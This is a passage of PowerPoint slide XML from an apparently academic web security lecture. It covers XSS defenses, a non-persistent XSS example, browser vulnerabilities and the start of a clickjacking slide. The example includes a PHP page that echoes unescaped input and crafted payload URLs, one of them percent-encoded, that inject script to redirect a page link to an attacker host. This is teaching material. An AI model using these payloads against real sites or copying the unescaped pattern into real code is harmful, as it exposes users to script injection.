          <p:cNvPr id="57346" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The primary defense mechanism to stop XSS is contextual output encoding/escaping. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>There are several different escaping schemes that must be used depending on where the un-trusted string needs to be placed within an HTML document including HTML entity encoding, JavaScript escaping, CSS escaping, and URL (or percent) encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Many web applications rely on session cookies for authentication between individual HTTP requests, and because client-side scripts generally have access to these cookies, simple XSS exploits can steal these cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in, and only permit that IP to use that cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Another mitigation present in IE, Firefox, Safari, Opera, and Chrome, is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" i="1" u="sng" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" u="sng" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>which allows a web server to set a cookie that is unavailable to client-side scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>some web applications are written to (sometimes optionally) operate completely without the need for client-side scripts. This allows users, if they choose, to disable scripting in their browsers before using the application. In this way, even potentially malicious client-side scripts could be inserted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>unescaped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> on a page, and users would not be susceptible to XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:ea typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Top 10 Cross Site Scripting Methods at https://www.owasp.org/index.php/Top_10_2007-A1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a: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ADD38E1-D443-40B3-A83F-E391AF4CAFBE}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B05020201040202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457200" y="152400"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Non-Persistent XSS Attack Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58370" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="838200"/>
            <a:ext cx="8610600" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Given the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>$name = $_GET['name']; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>echo "Welcome $name&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>&gt;"; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>echo "&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>="http://xssattackexamples.com/"&gt;Click to Download&lt;/a&gt;"; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The attacker crafts a URL and sends it to the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>index.php?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>=guest&lt;script&gt;alert('attacked')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>When the victim loads the above URL he sees an alert box which says </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>attacked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>; this example does no damage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>The attacker crafts a second URL and sends it to the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>index.php?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>=&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>window.onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> = function() </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> link=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>document.getElementsByTagName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>("a");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>link[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>="http://not-real-xssattackexamples.com/";}&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Now the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> of the first link of the page has been changed to point to the not-real-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>xssattackexamples</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Typically the attacker will encode the ASCII character as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0" err="1">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>index.php?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Copyright (c) 2009-2016  Arun Viswanatha, Ellis Horowitz, Marco Papa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583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132790D-20CF-43B7-8AD9-EE30C1229F5B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203"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tLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Browser and Plugin Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7475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593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57C4E81-FB07-4373-BB5B-975798848406}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59396" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Loosely defined, these are vulnerabilities in the client browser software or client plugins (Flash/Macromedia/Acrobat etc.) that can either enable other attacks, can enable execution of arbitrary code, raise privileges, compromise users privacy or simply crash the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>These are specific to the particular make and version of software like Mozilla, IE etc. and cannot be generalized. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>These vulnerabilities have to be patched by the vendors and the web application developers cannot do much about these except be aware of the issues. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B88472"/>
                </a:solidFill>
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Examples </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Firefox bug affecting FF 3.0.0 - Crash with malformed GIF file on Mac OS X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.mozilla.org/security/announce/2008/mfsa2008-36.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1200" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>     This is a vulnerability in Mozilla graphics code which handles GIF rendering in Mac OS X. A GIF file could be specially crafted to cause the browser to free an uninitialized pointer. An attacker could use this vulnerability to crash the browser and potentially execute arbitrary code on the victim's computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings 3" panose="05040102010807070707" pitchFamily="18" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1800" dirty="0">
              <a:cs typeface="Geneva" pitchFamily="3"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tLang="en-US">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76804"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04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F171FF-01EC-468E-8664-887C5B82782D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Gill Sans MT" panose="020B0502020104020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60420" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1219200"/>
            <a:ext cx="8229600" cy="4937125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1400" dirty="0">
                <a:cs typeface="Geneva" pitchFamily="3" charset="0"/>
              </a:rPr>
              <a:t> is a method used by malicious individuals to trick users into clicking something without them knowing what they</a:t>
            </a:r>
            <a:r>
